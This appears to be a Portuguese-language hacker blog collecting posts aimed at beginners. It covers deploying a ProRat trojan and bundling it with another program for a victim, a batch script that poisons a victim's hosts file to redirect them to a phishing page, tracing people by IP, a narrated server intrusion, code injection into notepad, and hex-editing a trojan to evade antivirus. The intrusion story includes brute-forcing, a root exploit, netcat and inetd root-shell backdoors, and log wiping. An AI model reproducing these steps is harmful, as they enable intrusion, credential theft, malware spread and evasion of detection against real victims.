em ADD que está nas opçoes de Hosts / Redirects em uma barra esquerda do
site, la você da um nome ao seu ip fixo, e bota seu ip em numero ( PARA
VELO VA EM

http://WWW.MEUIP.COM.BR
). Deixe tudu do geito que está e va
em Creat Host. PRONTO VOCÊ TEM SEU IP FIXO ! Mas lembresse, toda vez ke
você se acessar a internet, seu ip tambem muda, então va em sua conta no
site, e mude o ip em numeros do seu IP FIXO, escolhendo a OPÇÃO manage da
barra Hosts / Redirects !





Pronto agora você tem seu ip-fixo. Va na pasta do ProRat, la existe um
programa chamado ProConective, abra-o , e deixe ele minimizado, agora abra
seu ProRat, Crie um servidor. Quando estiver criando, va em notificações e
bote seu ip fixo em Endereço Ip ( Dns ), se você escutar um som dizemdo "
conectado " e porque funcionou, termine de criar seu servidor. Junte ele a
outro programa qualquer e mande para a pessoa.



Depois que a pessoa tiver instalado o trojan, abra o ProRat, e va na opção
ProConetive, escolha a opção Começar a listar as Notificaçoes.

Pronto você recebera o ip da vitima e poderar fazer o que quiser.











ALERTA : depois de criar seu servidor e deixalo indetectavel, por algum
motivo quando o " ProConnective " está on, o Av e capaz de detectalo, ao
fexar o ProConnective, ele não detecta mais. NÃO SEI COMO ISSO IRA SE
PORTAR NA CASA DO PORTADOR DO TROJAN !







Eu não sei como se comporta o antivirus com arquivos .bat executado no
winrar, realmente não vou testalo no meu pc.





GALERA VAMOS DEIXAR UM RECADO AE SOBRE O QUE ACHARAM O/



*Galera eu sabia que isso iria acontecer, CERTIFIQUEM-SE , que o
ProConnective esteja aberto na hora de fazer o test.







Galera, So um recado, conexão reversa do Flux e bem melhor e mais facil,
intaum recomendo que usem ele.


 


 


 


 


 


 

Postado por BTHacker às 12:05
0 comentários

Marcadores: Tutoriais Hacker

REDIRECIONAMENTO PARA PAGINAS FALSAS



REDIRECIONAMENTO
PARA PAGINAS FALSAS


 


 

Para Aqueles que Utilizam Paginas Falsas Para Descubrir Senhas,
Ai Vai a Dica:



Com o Arquivo hosts que
esta localizada na pasta C:\WINDOWS\system32\drivers\etc\hosts,
é possivel redirecionar a para a pagina falsa que voce criou
quando a VITIMA tenta acessar a Página Verdadeira.



Para isso, edite o

arquivo

hosts e escreva
na ultima linha

n°_ip_da_pagina_falsa site_verdadeiro



Por Exemplo:

Voce quer Crackear uma Conta do Hotmail, então voce cria uma
pagina falsa, cuja o IP é 201.109.23.10.



Então na Ultima Linha voce escreve:



201.109.23.10

http://www.hotmail.com








Mas Como Vou Colocar Isso No Arquivo HOSTS da Minha Vitima



`

É Simples. Faça Uma Arquivo Em Lotes com o Código Abaixo:



 

Código:

Selecionar tudo


 

@ echo off

cd\

echo ip_pagina_falsa site_verdadeiro >> %windir%\system32\drivers\etc\hosts



 







Salve Com extensão .bat.

Depois Basta Enviar Para a Vitima



Abraço pessoal, Até a Próxima! Espero ter Ajudado!



FUIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII


 


 


 


 


 


 

Postado por BTHacker às 12:04
0 comentários

Marcadores: Tutoriais Hacker

Sábado, 26 de Abril de 2008

RASTREANDO UM ENDEREÇO DE IP



RASTREANDO UM ENDEREÇO DE IP


 



Escrito por SPYNET



Achei esses links interessantes, eles mostram a Cidade/País/CEP de um IP
informado.

E claro, não é 100% correto mas dá pra ter uma idéia legal do endereço.



Então vamos há algumas explicações dos passos para rastrear um IP.

Primeiro é bom distinguir IPs nacionais dos internacionais, no Brasil a faixa
inicial geralmente são:

200.x.x.x e 201.x.x.x, não é regra, há alguns com 207.x.x.x por exemplo mas não
é tão comum.

É necessário saber isto para agilizar sua busca, pois não adianta procurar no

sistema
de consulta de CEPs um IP lá da China.

Mas como cérebro foi feito pra lembrar a programação da TV e não números, aqui
vai a solução:

http://www.maxmind.com/app/lookup


Informe o IP, e será mostrado de qual ele pertence.

______________________________





Agora entendendo um pouco de como os sistemas de buscas relacionam CEPs com IPs:

Bom tudo começa das estruturas físicas da

rede
, físico me refiro a fios, postes, caixas telefônicas, localização do
provedor, etc. Quando você recebe um IP, seu provedor gera ele apartir do seu
CEP(não é bem um cálculo com seu CEP e sim questão de proximidades).

Explico: Supomos que você recebeu o IP 200.196.196.5 e seu vizinho recebeu
200.150.30.2, sendo que ele mora no mesmo CEP que vc,

o que aconteceria é que o ping(tempo para recebimento de pacotes)
demoraria(suposição) uns 150ms(isso é lento, sim eu amo parenteses :lol.

O que na realidade deveria ser uns 70ms mais ou menos.

Então o provedor lhe atribui IPs conforme seu CEP, sendo assim seu vizinho
provavelmente receberá um IP semelhante ao seu, pelo menos na teoria seria
assim, ao menos que se escasse os IPs semelhantes, mas aí é outro papo.

Entendido isso de CEP x IP, vamos a forma de rastreá-los.

______________________________



Há um projeto nacional chamado IPGeo mantido pelo Portal RankBrasil, que mantêm
um banco de dados com uma relação imensa de IPs -> CEPs. Bom ao certo de onde
eles colhem essas informações eu não sei, suponho que seja algo vinculado aos
provedores e ao Registro.br.



Então vamos lá, acesse o site:

http://www.ipgeo.com.br


E informe o IP que deseja consultar, como exemplo vou usar o meu atual: IP
200.203.3.62

O que vai acontecer, o sistema irá sempre mostrar uma série de resultados, pois
são os IPs mais semelhantes ao seu, caso encontre

exatamente o IP informado, ele irá ser mostrado no topo da lista.



Resultado obtido:

Citar

Proximidades de IP com CEPs confirmados



200.203.3.62 95020180 Caxias do Sul RS

200.203.3.63 95180000 Farroupilha RS

200.203.3.63 95700000 Bento Gonçalves RS

200.203.3.64 95020320 Caxias do Sul RS

200.203.3.64 95020460 Caxias do Sul RS

200.203.3.64 95097000 Caxias do Sul RS

200.203.3.65 95010100 Caxias do Sul RS





Próximo passo, como localizou meu IP exato, procurei no site dos correios o CEP
que me apresentou.



http://www.correios.com.br/servicos/cep/cep_cep.cfm




E olhem o resultado:




http://i2.tinypic.com/xni4g3.png








Sim, o endereço tá correto mesmo, aqui da empresa.

Ah detalhe bastante importante, MEU IP NÃO É FIXO NEM EMPRESARIAL.



Agora acontece também de não mostrar o IP informado e sim só os das
proximidades, então caso saiba mais informações(como a cidade por exemplo) sobre
o IP que está consultando, lhe ajudará a filtrar os resultados mostrados.

Acontece também de não mostrar corretamente a cidade, acredito que ocorre pois o
banco de dados pode estar desatualizado, sendo que é feito a nova verificação a
cada 24h, então caso tenha certeza que o resultado mostrado está incorreto,
anote o IP e consulte novamente dentro de algumas horas ou no dia seguinte.

Básicamente para IPs nacionais seria isso, como eu falei não é 100% mas ajuda.

______________________________



Ainda em buscas no Brasil temos outro recurso que é o Registro.br(
http://www.registro.br/).

Já essa alternativa é mais adequada de quando estamos consultando IPs(fixos) de
servidores, os quais estão registrados um dominío, um IP fixo empresarial, etc.

Caso consultar um IP dinâmico qualquer, provavelmente os resultados serão os
dados do companhia de telecomunicações da região, como Brasil Telecom.

Exemplo, consultei pelo meu IP:

Citar

...

inetnum: 200.203.0/17

asn: AS8167

ID abusos: BTA17

entidade: Brasil Telecom S/A - Filial Distrito Federal

documento: 076.535.764/0326-90

responsável: Brasil Telecom S. A. - CNRS

endereço: SEPS 702/092 Cj. B - Bl B 3 andar Gen. Alencastro, S/N,

endereço: 70390-025 - Brasilia - DF

telefone: (61) 415-4201 []

ID entidade: BTC14

ID técnico: BTC14

inetrev: 200.203.0/24

servidor DNS: ns3.brasiltelecom.net.br

...



Agora outra consulta, mas pelo IP 200.176.3.142

Citar

...

inetnum: 200.176/16

asn: AS11706

ID abusos: ABT82

entidade: Terra Networks Brasil S.A.

documento: 091.088.328/0003-29

responsável: Hostmaster Terra Networks

endereço: João Manoel, 90,

endereço: 90010-030 - Porto Alegre - RS

telefone: (51) 32844000 []

ID entidade: MPL4

ID técnico: MPL4

inetrev: 200.176.0/18

servidor DNS: ns1.terra.com.br

...



Como deu pra notar, é o IP do terra.com.br, então essa é a diferença de um IP
registrado.

______________________________



Mas e no caso de um IP que não seja do Brasil ?

Bom aí se fizermos pelo método anterior não teremos resultados precisos. Para
isso há outro site americano, MaxMind

que disponibiliza recursos semelhantes ao IPGeo.

Acesse:

http://www.maxmind.com/app/lookup_city


E a teoria é a mesma, porém como é outro país o sistema de caixa postal (CEP)
será diferente.

Então como saber onde procurar, aqui:


http://www.embassyworld.com/data/Zip_Codes.html


há uma listagem de serviços e sites que buscam códigos postais de diversos
países.



Vamos a um exemplo na prática!



Enquanto estava no painel de administração do Fanta Hackers observei que tinha
um visitante com IP do exterior, esse: 65.214.39.151

Fiquei curioso e resolvi rastrear ele, vamos aos passos:

- Descobrindo País/Cidade/Estado

Resultado:




http://i2.tinypic.com/xni5n7.png




- Como ninguém nasceu de susto, vamos confirmar realmente se o MaxMind trouxe
informações boas. Para isso consultaremos também no Whois (
http://whois.lacnic.net/)
que é o substituto do Registro.br mas para consultar internacionais.

Então tudo certo, os dados estão corretos mesmo:

Citar

OrgName: AskJeeves, Inc.

OrgID: C00555427

Address: 5858 Horton Street

City: Emeryville

StateProv: CA

PostalCode: 94608

Country: US



Bom essa foi fácil, como deu pra notar é um IP empresarial no qual já nos
mostrou inclusive o nome da organização AskJeeves

- Uma consulta rápida no oráculo pela empresa e chegamos à
http://www.ask.com/

- Pra quem deduziu, descobrimos já quem é nosso visitante. Como trata-se de um
portal de buscas, o nosso convidado é um WebBot que esta catalogando os dados
contidos no Fanta.

Mas vamos continuar a busca:

- Acesse

http://maps.google.com
e informe o nome da empresa AskJeeves

- Altere o modo de visualização para Hybrid(imagem de satélite + nomeclatura de
ruas)



- Ao lado, irá nos mostrar uma listagem de diversas filiais da empresa, como já
sabemos que a desejada encontra-se em Emeryville - California, selecionamos
esta.

- Chegamos ao resultado preciso abaixo:




http://i3.tinypic.com/xni81h.png






Alguém quer fazer uma visita a eles?



-------



Porém como citei antes, essa foi fácil, localizar uma empresa não é nada
complicado. Mas e no caso de um usuário internacional comum?

Nesse ponto nossos recursos se restringem um pouco, mas vamos ver até onde
conseguimos chegar.



Nosso IP de exemplo será: 69.18.1.201

- Consultando a localização

http://www.maxmind.com/app/lookup_city





http://i3.tinypic.com/xni8e8.png




- O que identificamos: Local Internet Service Company, bom agora complicou pois
não é tão simples como antes, descobrimos que o IP é de um Provedor de Internet.

Ou seja, um usuário comum.

- Seguimos direto para o Google Maps e informamos os dados da cidade:



- Nesse caso o melhor modo de visualização é Map;

- Como essa cidade Fairfield parece ser o lugar onde o diabo perdeu as meias, o
zoom no mapa é bem limitado:




http://i1.tinypic.com/xni8o7.png




- Então vamos tentar no MapQuest(
http://www.mapquest.com/)
e informamos o código postal: 52556

Bom, um pouco mais detalhado...




http://i3.tinypic.com/xni92b.png






Com isso as informações que temos, consiguimos chegar até este ponto, não
obtivemos o endereço específico, mas uma noção boa da localização.



______________________________





Bom, então o passo-a-passo que eu sugestionaria para iniciar um rastreamento
seria os seguinte:

- Analise o IP e descubra qual seu país;


http://www.maxmind.com/app/lookup




- Sabendo a nacionalidade:

* Se for nacional:

1) Consulte no

http://www.registro.br


2) Se constatar que o IP não está registrado, pesquise novamente em

http://www.ipgeo.com.br


3) Tendo o CEP em mãos, consulte ele


http://www.correios.com.br/servicos/cep/cep_cep.cfm


* Caso seja internacional:

1) Busque primeiro no Whois:

http://whois.lacnic.net


2) Senão retornar nada útil tente em:

http://www.maxmind.com/app/lookup_city


3) Descoberto o país, consulte em


http://www.embassyworld.com/data/Zip_Codes.html


4) Acesse algum dos sites da lista referente ao país do IP

5) Busque pelo código postal localizado

6) Caso seja americano, uma boa dica é procurar no Google Maps



- E se não conseguiu com nenhuma dessas alternativas, bom aí só resta ligar para
o provedor do IP, e tentar passar uma engenharia

social convencendo eles a te darem os dados do IP. O que eu acho quase
impossível, a menos que vc seja da PF hahaha.

Postado por BTHacker às 07:52
0 comentários

Marcadores: Tutoriais Hacker

SIMPLES ATAQUE RACKER



EXEMPLO DE UM SIMPLES ATAQUE
HACKER PARA INICIANTES


 


 

Olá pessoal, estou escrevendo esse tópico porque muita gente que nunca
invadiu realmente não faz a mínima idéia de como é fazer tal coisa ou se já
invadiu não sabe o que fazer após "avançar entre as entranhas do alvo". Esse
pode ser um tópico bem idiota eu admito, mas com ele espero dar uma luz para os
iniciantes. Esse tópico vai mostrar o exemplo de um defacement. Como achar um
alvo vulnerável, como não ser pego em uma invasão, etc. Tudo isso em uma pequena
historinha fictícia, mas com ferramentas e vulnerablilidades reais. Vamos
começar.



(1-) O início:



Aqui o hacker que eu vou chamar de Jonathan criou um mirror(página criada para
fazer o defacement de um site substituindo-a pela original) em html. Ela tem um
fundo preto, com uma grande mensagem escrito "Exploited by Cyb3r_D14bl0" que se
trata do apelido hacker de Jonathan, além de uma foto criada por ele muito legal
no photoshop, sua marca registrada, além de um link que permite enviar um email
para ele próprio. John está frustrado e aborrecido porque não encontra nenhum
alvo vulnerável. Mas hoje Jonathan jurou que não sairia da frente do computador
até que conseguisse hackear um site. Jonathan então toma as primeiras
providências para o ataque.



(2-) Escondendo-se na rede:



O fato do mirror de Jonathan ser simples, não significa que ele é um imbecil.
Ele sabe que deve ocultar seu endereço ip ou será pego na primeira tentativa de
ataque. Jonathan começa acessando a página

http://www.stayinvisible.com
. Essa página mostra o endereço ip de
seus visitantes. O ip de Jonathan é 201.143.222.88. Então ele usa o programa
Anonymity4Proxy, e procura o endereço ip de um bom servidor proxy na grande
lista do programa. Ele encontra um servidor proxy no México marcado como high
anonymity(alto anonimato). Isso é bom para Jonathan. O endereço ip desse proxy é
67.154.22.224. Jonathan liga o computador do lado que está rodando Linux
slackware 10.2 (ele antes estava em outro com Windows XP sp2). Jonathan
configura os browsers e serviços adicionais de ambos os sistemas para que se
conectem ao proxy. Jonathan acessa a novamente a página

http://www.stayinvisible.com
e sorri ao ver que em ambos os
sistemas o seu ip não apareceu mais na página, e sim o ip do proxy que Jonathan
escolheu. Agora ele está anônimo e pronto para atacar.



(3-) FootPriting & FingerPriting. Invadindo...:



Nessa fase do ataque, Jonathan vai procurar por alvos vulneráveis e explorá-los
com o objetivo de invádi-los. Jonathan começa visitando alguns sites e de
repente, sem querer Jonathan acessa um site chamado

http://the-fact-pleasure.net
. Se trata de um site de pedofilia! Se
tem uma coisa que Jonathan odeia são os pedófilos. Jonathan escolheu seu
alvo(atenção esse site é fictício). Jonathan começa abrindo um terminal em seu
sistema linux e digitando o seguinte comando no terminal:



# ping -c4 the-fact-pleasure.net





Isso envia 4 pacotes do tipo icmp echo request para o site. Com isso Jonathan
pega o ip do site que é 208.194.22.126 e também Jonathan percebe que o site
normalmente respondeu a todos os pacotes. Isso significa que o firewall do site
não deve estar filtrando tráfego icmp. Jonathan analisa o esquema de
endereçamento ip e deduz as seguintes informações a respeito da rede do alvo:



(a-)Se trata de uma rede de classe C(o ip começa com 3 dígitos maior que 191).

(b-)A máscara da rede é de 255.255.255.0 (somente os últimos 3 digítos dos
endereços ips sofrem alterações).

(c-)Pode-se ter até 255 computadores na rede( 208.194.22.1 até 208.194.22.255).




Agora Jonathan deseja descobrir quais desses host estão online na rede, então
ele vai usar um ping scan utlizando-se do nmap para tal, usando a seguinte linha
de comando:



# nmap -sP -vv 208.194.22.1-255 > /home/log_hosts.txt



Após alguns minutos, Jonathan checa o log e ve que os seguintes hosts estão "alive":



208.194.22.12

208.194.22.17

208.194.22.56

208.194.22.88

208.194.22.100

208.194.22.115

208.194.22.126

208.194.22.201

208.194.22.211

208.194.22.253



Caso o servidor do site esteja muito protegido, Jonathan poderá tentar hackear
esses computadores para usa-los como "trampolin" para o servidor do site. Agora
ele vai fazer o teste de fingerpriting para pegar informações preciosas sobre o
servidor do site. O comando é o segunite:



# nmap -O -vv -sV 208.194.22.126





Esse teste retomou as seguintes informações:





as portas tcp 21,22,25 e 80 estão abertas. (Serviços ftp, ssh, smtp e http).

O sistema operacional é linux red hat 2.4.18 ou 2.4.19(sem certeza).

Na porta 21 está um servidor pureFTPD, na 22 um servidor open ssh 1.1, na 25 um
servidor qmail e por último um apache mod_ssl v 1.3.37]



Jonathan ja adquiriu bastante informações sobre o alvo até aqui. Mas ele deseja
saber mais ja que até aqui ele não encontrou uma vulnerabilidade perigosa que o
permita invadir o sistema. Ele tenta então traçar a rota para descobrir mais
informações a respeito do firewall do alvo, ele então digita o seguinte comando
no seu terminal:



# traceroute 208.194.22.126





Normalmente em um traçamento de rotas, o penúltimo salto é o firewall do alvo e
o penúltimo salto era o endereço ip 194.126.22.1. Agora ele tem o ip do possível
firewall do alvo. Para ter certeza ele faz o seguinte teste com o nmap:



# nmap -vv -O 194.126.22.1



Isso gerou o seguinte resultado:



(a-)as portas 1000 está abertas...

(b-) Device type: firewall/router





Agora Jonathan tem certeza de que se trata de um firewall e um firewall que ele
conhece muito bem. O Web min que é configurado via browser, Jonathan digita a
seguinte url no seu navegador konqueror do linux:

http://194.126.22.1:1000




Uma tela de login de administração de firewall acaba de se abrir no seu
navegador!



Em seguida, Jonathan scaneia a rede do firewall, apenas tentando localizar as
portas 79 e/ou 23 em algum computador aberto, para isso ele usa novamente o nmap
com o seguinte comando:



# nmap -sT -p23,79 -vv 194.126.22.2-255 > /home/log2.txt



Ao analisar o log, Jonathan ve que o host e194.126.22.131 está com as portas 23
e 79 abertas. Jonathan da o comando finger nesse host e enumera os seguintes
usuários:



root

mark

lizie

guest



Jonathan se utiliza do programa Brutus para fazer brute force no telnet e obtém
sucesso. A senha do root é $!#donothackit$!#



Jonathan invade o host e baixa os arquivos passwd e shadow, em seguida faz
cracking deles com o programa john the ripper. Ele deduz que os usuários podem
ser os mesmos para todos os hosts dessa rede, já que foram muito poucos os
computadores marcados como "alive".



Jonathan deduz correto. A conta login mark/password h4xor1234 é a conta do
administrador do firewall. Antes de simplesmente derrubar o firewall do alvo,
Jonathan faz outro teste com o nmap no site para descobrir quais portas estão
abertas, mas que estão sendo filtradas pelo firewall. Jonatham executa o
seguinte comando no seu terminal:



#nmap -sA -vv -p1-200 208.194.22.126



As seguintes portas estão marcadas como "unfiltered": 21,22,23,53,69,79,80,110



Bingo! Mais um telnet! Agora sim Jonathan invade o firewall derrubando-o e em
seguida da um finger no sistema. Jonathan consegue apenas enumerar o usuário
lilith. Ele usa novamente o brutus para fazer brute force no telnet e descobre a
senha do usuário lilith. Ele conseguiu uma shell remota em seu alvo com poderes
normais.



a saída foi:



[server04@lilith]$



Jonathan digita id e ve o que ele possui um uid = 1000 e um gid = 1000. Ele
precisa obter acesso root para fazer o defacement. Ele lembra da versão do
apache e tem uma idéia. Primeiro ele executa esse comando na shell:



$find /bin -perm +4000



Ele sorri ao ver que a sua conta hackeada tem permissão para usar o ftp. Ele
conecta em um ftp de um site hacker, baixa um exploit local que explora um bug
no apache. Em seguida Jonathan o compila:



$gcc -o gotRoot exploit_exemplo.c



E o executa....



Jonathan fica empolgado e a adrenalina no seu corpo aumenta. ele ve outra shell
em sua tela



[server04@root]#



Ele digita esses comandos só para confirmar



# id

# whoami



Ele está logado como root! Sem perder tempo ele executa o seguinte comando:



# whereis apache



a saida foi:



/home/root/apache



Basta executar:



# cd /home/root/apache

# cd htdocs



Jonathan executa um ls e pronto! Ele localiza o index1.html! Agora é hora de
desfigurar a página:



Ele remove a página usando o comando:



# rm index1.html



Em seguida ele vai transferir seu mirro via linha de comando. Seu computador
está com o serviço ativo de ftp, então Jonathan usa o servidor do site no seu
computador dando o seguinte comando:



# ftp 201.143.222.88 user Cyber pass Diablo



Após conectar, basta dar o seguinte comando:



> get index1.html



Agora Jonathan desconecta do seu ftp e move o mirror para o local da página
original com o seguinte comando:



mv /ftp-files/index1.html /home/root/apache/htdocs



Pronto, a página foi desfigurada! Agora Jonathan precisa dar um jeito de criar
suas backdoors e apagar seus rastros no sistema.



(4-) Backdoors:



Primeiramente, Jonathan foi para o diretório principal do sistema com o comando:



# cd /etc



Lá, ele editou o arquivo rc.local com o editor vi inserindo a seguinte linha de
comando nele:



nc -l -p 6012 -e /bin/sh



Isso lhe da uma shell imediata com poderes de root sem qualquer forma de
autenticação na porta tcp 6012 no próximo boot do sistema.



Jonathan cria uma conta pirata no sistema com poderes de root com o comando
adduser e depois altera os privilégios de uma conta qualquer para root, assim
despistando os administradores.



Por último, Jonathan percebe que o sistema é antigo, pois possui o arquivo
inetd.conf em /etc. Ele edita esse arquivo também com o vi inserond o nele o
seguinte conteúdo:



cool stream tcp nowait root /bin/sh -i



E depois também edita arquivo services com o seguinte conteúdo:



cool 775/tcp cnn



Mais uma shell para Jonathan....



Agora com suas backdoors, Jonathan vai apagar os logs do sistema para não ser
pego usando esses comandos:



# echo " " > /var/log/ossec/*.log

# echo " " > /home/root/apache/logs/*.log

# echo " " > ~ .bash_history

# echo " " > /var/log/ossec/*.log



Com isso todos os logs do sistema ficam com conteúdo em branco(nulo). Por
último, Jonathan da um reboot no sistema para suas backdoors serem ativadas, ele
desconecta do seu alvo e proxy. Jonathan sorri ao acessar

http://the-fact-pleasure.net
e visualizar seu mirror. E o melhor
de tud é que ele dificilmente vai ser pego por isso...



Bom gente é isso ai, espero que vocês gostem. Isso é ridiculo para os hackers
experientes desse fórum, mas espero ter ajudado os iniciantes a entenderem como
um ataque hacker é realizado. Foi um exemplo simples, mas espero que tenha
valido a pena. Abraço pra todos, fui.

Postado por BTHacker às 07:51
0 comentários

Marcadores: Tutoriais Hacker

QUEBRANDO SENHA DO WINDOWS



Windows Admin Password Hack


 





Olá pessoal, estou aqui no fórum com mais tuto!



Se você esqueceu da senha do seu PC ou se você brigou com seu amigo de quarto e
ele botou uma senha no Windows e você não tem acesso nenhum ao PC, não se
preocupe! Vamos aprender a quebrar senha do
Windows
através do Boot!



Mas o que é Boot?

Em computação, boot é o termo em inglês
para o processo de iniciação do computador que carrega o

sistema operacional
quando a máquina é ligada(fonte: wikipedia), ou seja, é
o que define o que vai ser carregado. Resumindo, a MB(motherboard), é programada
geralmente para dar boot no HD, para iniciar o Windows.



Mais o que isso tem haver com quebrar a senha do
Windows?


Bom vamos usar um programa chamado
Windows Admin
Password Hack
, que quebra a senha do Windows atraves do boot! Mas o
programa só vai funcionar se estiver gravado em um CD e em formato
.iso .



Pra isso você grava somente o arquivo cd050303
em um CD virgem!

Pronto, quando o computador ligar na tela do BIOS você insere o CD no Drive!



DOWNLOAD:






Senha:


http://www.invasao.com.br

Postado por BTHacker às 07:45
1 comentários

Marcadores: Tutoriais Hacker

INJETANDO CÓDIGOS



INJETANDO CÓDIGOS


 





Neste tutorial vamos ver como injetar novos códigos em um
executável já compilado. Vamos modificar o bloco de notas do
windows para que exiba uma simples mensagem de texto ( pois é uma
das função mais fáceis que o Windows fornece ) quando for
iniciado.



Antes de tudo, faça uma cópia do bloco de notas ( C:\WINDOWS\notepad.exe
) para uma pasta qualquer ( vamos usar essa cópia, pra preservar o
original ). O que nós vamos fazer é o seguinte: desviar o início
do código do notepad para outro local, exibir a mensagem e depois
retornar ao ponto original.







Para fazer isso, precisamos encontrar na seção do código do
notepad, um local vazio, que não altere a

funcionalidade
do programa, o que é chamado de "Code-cave".
Abra o notepad.exe no Olly e role o código para baixo. Lá pelo
offset 8747 você deve encontrar o início da code-cave, uma seção
sem código algum, apenas com valores 00:







Essa região a partir de 8747 é a que vamos utilizar para escrever
nosso código. Como disse, vamos adicionar uma MessageBox no início
da execução. Vamos dar uma olhada na função MessageBoxA para ver o
que nós precisamos:



 

Código:

Selecionar tudo


 

int MessageBox(



HWND hWnd, // handle of owner window

LPCTSTR lpText, // address of text in message box

LPCTSTR lpCaption, // address of title of message box

UINT uType // style of message box



);


 





Para chamar a função, precisamos passar 4 argumentos. hWnd indica
à qual janela a Msgbox pertence. lpText e lpCaption são o texto da
mensagem e o título da janela, respectivamente. E por útlimo,
uType indica o estilo da janela, como número de botões e ícones.

Precisamos gravar o texto e o título da janela em algum lugar, e
esse lugar é a própria code-cave. Vamos ao título primeiro.



A partir do início da code-cave, selecione o número de linhas que
você vai usar para armazenar o título, sendo que cada linha que
você selecionar vai ocupar o espaco de 1 caractere. Vou usar como
título "F3rGO!", que contém 6 caracteres. Então seleciono 6 linhas
a partir do início da CV ( code-cave ), usando SHIFT, clico com o
botão direito sobre a seleção e em seguida "Binary->Edit". Em
seguida, marque a caixa "Keep Size" e digite a sua mensagem no
campo ASCII:







Aperte OK. O Olly primeiramente entede o que você digitou como uma
sequência de comandos, por isso a sua mensagem não apareceu
corretamente na janela de código. Aperte CTRL+A para o Olly
analisar o cógido novamente e aí sim você deve ver a sua string
corretamente. Repita o mesmo processo para o texto da janela (
selecionando as linhas a partir da linha que contém o seu título
). Eu usei como texto "Notepad modificado!", que contém 19
caracteres ( espaços contam como caracteres ). Selecione as 19
linhas e faça o mesmo que você fez para o título. No final, terá
algo assim:







Já temos armazenado as nossas strings, então podemos chamar a
função. Lembre-se que os argumentos da função são puxados na ordem
inversa, ou seja, devemos usar o comando PUSH partido da uType
para o hWnd. Escolha um offset qualquer da CV ( pode ser logo
abaixo das strings ). Eu usei o 01008763. Escreva o código da
chamda da função ( na hora de puxar o título e texto, indique o
endereço de cada um no código ( 01008747 e 0100874E no meu caso
)). Para escrever o código, basta dar 2 cliques sobre a linha e
entrar com o comando. Seu código deve ficar assim ( os comentários
eu adicionei ):







Já temos o código da msgbox, precisamos desviar o ínicio do
programa 01008763 para chamar a mensagem e depois retornar à
sequência de código original. Ainda não vamos adicionar o JMP de
retorno após a chamada por motivos que vou explicar adiante.
Memorize o endereço 01008763, pois é para ele que vamos desviar (
ja que é onde tem início a chamada da msgbox ).



Clique com o botão direito em qualquer lugar do código e em
seguida "Goto->Origin *". Fomos levado até o EntryPoint ( ponto de
entrada ) do programa.



 

Código:

Selecionar tudo


 

0100739D 6A 70 PUSH 70

0100739F 68 98180001 PUSH NOTEPAD.01001898

010073A4 E8 BF010000 CALL NOTEPAD.01007568

010073A9 33DB XOR EBX,EBX


 





Vamos ter que alterar o PUSH 70 para um jump até o endereço
01008763. Antes de alterar, anote os comandos desses 2 primeiros
offsets ( PUSH 70 e PUSH NOTEPAD... ). Já explico o porquê. Agora
dê um duplo clique sobre o PUSH 70 e altere para JMP 01008763 (
marque a opção Fill with NOP's ). Certo, desviamos o nosso código,
mas repare que foram perdidos 2 comandos devido a esse jump ( os 2
que você anotou ). Isso se dá ao fato que o comando JMP ocupa o
espaço do PUSH 70 e de parte do outro PUSH, completando com NOPs
os bytes que sobraram. Não podemos deixar assim, precisamos de
alguma maneira adicionar esses 2 comandos perdidos em algum lugar.
Onde? Na code-cave após a chamada da MessageBoxA.



Antes de voltar para a MessageBox, anote o offset do CALL
NOTEPAD.01007568 ( 010073A4 ), pois depois da msgbox ser exibida,
nós vamos ter que pular nesse endereço, para que a execução
continue.



Volte para a região da sua MessageBox e adicione os 2 comandos
anotados ( quando for adicionar o segundo comando, deixe somente o
push com o endereço, remova o texto "NOTEPAD." ). Agora podemos
realizar o jump de retorno ao código normal. Basta adicionar um
novo JMP após o fim do código injetado para o endereço 010073A4 (
offset que você acabou de anotar ). No final das contas, seu
código deve ter ficado semelhante a isso:







Pode salvar seu arquivo ( "Botão Direito->Copy to Exetuable->All
Modifications->Copy All->Botão Direito->Save File" ) e testar. Se
você fez tudo certo, deve ter visto isso ao iniciar o seu bloco de
notas modificado







Até a próxima!



F3rGO!



--

Fonte: fergo.110mb.com/engrev/tut10/tut_engrev10.html

Autor: Fergo



Não podia deixar de postar esse tutorial magnífico do senhor Fergo
..

Ótimo conteúdo .. muito bom mesmo .. !



Espero que aproveitem .. !


 


 


 


 


 


 

Postado por BTHacker às 07:44
0 comentários

Marcadores: Tutoriais Hacker

CAMUFLAR UM VIRUS COM HEXA DECIMAL



CAMUFLANDO UM VIRUS COM
HEXADECIMAL, TORNANDO-O INDETECTAVEL


 


 

Antes de começarmos eu sei que irá haver muitas perguntas sobre o por que de
se editar hexadecimalmente um trojan, tudo está diretamente relacionado à como o
vírus é detectado pelo anti-vírus... O seu anti-vírus procura pelo código
hexadecimal dentro dos programas para ver se batem com os números hexadecimais
que ele tem guardado em sua assinatura (aquele arquivo que é atualizado
constantemente), se coincidir os números, é vírus hehe. Tendo essa idéia em
mente, uma saída simples é essa: altere esse código que está cusando problemas!
Como? vamos lá:

Precisamos de:

-Um editor hexadecimal (usaremos o HEXPlorer por ser freeware)

Download


-Um server de qualquer trojan

-E por último um anti-vírus

Simplesmente após criar seu server (deiche seu anti-vírus desligado), abra ele
com o Hexplorer, vários números aparecerão. Role a tela até mais ou menos a
metade, selecione TODOS os números dalí para baixo.

Após feito isso, note um botão no canto superior direito, ele tem o formato de
um ZERO, clique nele, perceba que todos os números selecionados viraram ZEROS




Para compreender o quê isso está fazendo é simples, o ZERO na linguagem
hexadecimal significa um ponto sem operação, o ZERO é nulo... Após feito isso
salve o arquivo em um outro local, vá até aquele local, e apertando o botão
direito, selecione a opção do seu antivírus que diz para escanear por vírus. Se
o seu anti-vírus achou alguma coisa, exelente, isso significa que o código que o
indentifica como sendo um vírus está na parte inferior de todos aqueles números
hexadecimais. Se achou algo é o contrário, o código está na parte superior.

Agora vamos para a parte menos complicada, volte para o hexplorer e dê um CTRL+Z
para voltar ao formato original. Se seu anti-vírus não localizou nada, comece
"zerando" os números por partes de baixo para sima, se ele localiou, comece pelo
contrário.

Após localizar os números hexadecimais que seu anti-vírus capta como sendo um
vírus, mude-os de forma que não afete o arquivo...

Pontos a declarar:

-Não pence que será fácil mudar os números sem corromper o arquivo;

-Não pence que TODOS os antí-vírus não irão mais detectar seu vírus, isso ocorre
por que cada anti-vírus possue um número diferente que identifica o vírus como
sendo o próprio. Mais não fique desanimado, muitos anti-vírus possuem
assinaturas iguais para pegar os vírus...

-E por último mas mais importante: fassa seu próprio trojan. Mantenha ele em
versão privada para somente o você usar.



Programa do tutorial

Download :


http://www.sofotex.com/downloads/d26421.html

Postado por BTHacker às 07:40
0 comentários

Marcadores: Tutoriais Hacker

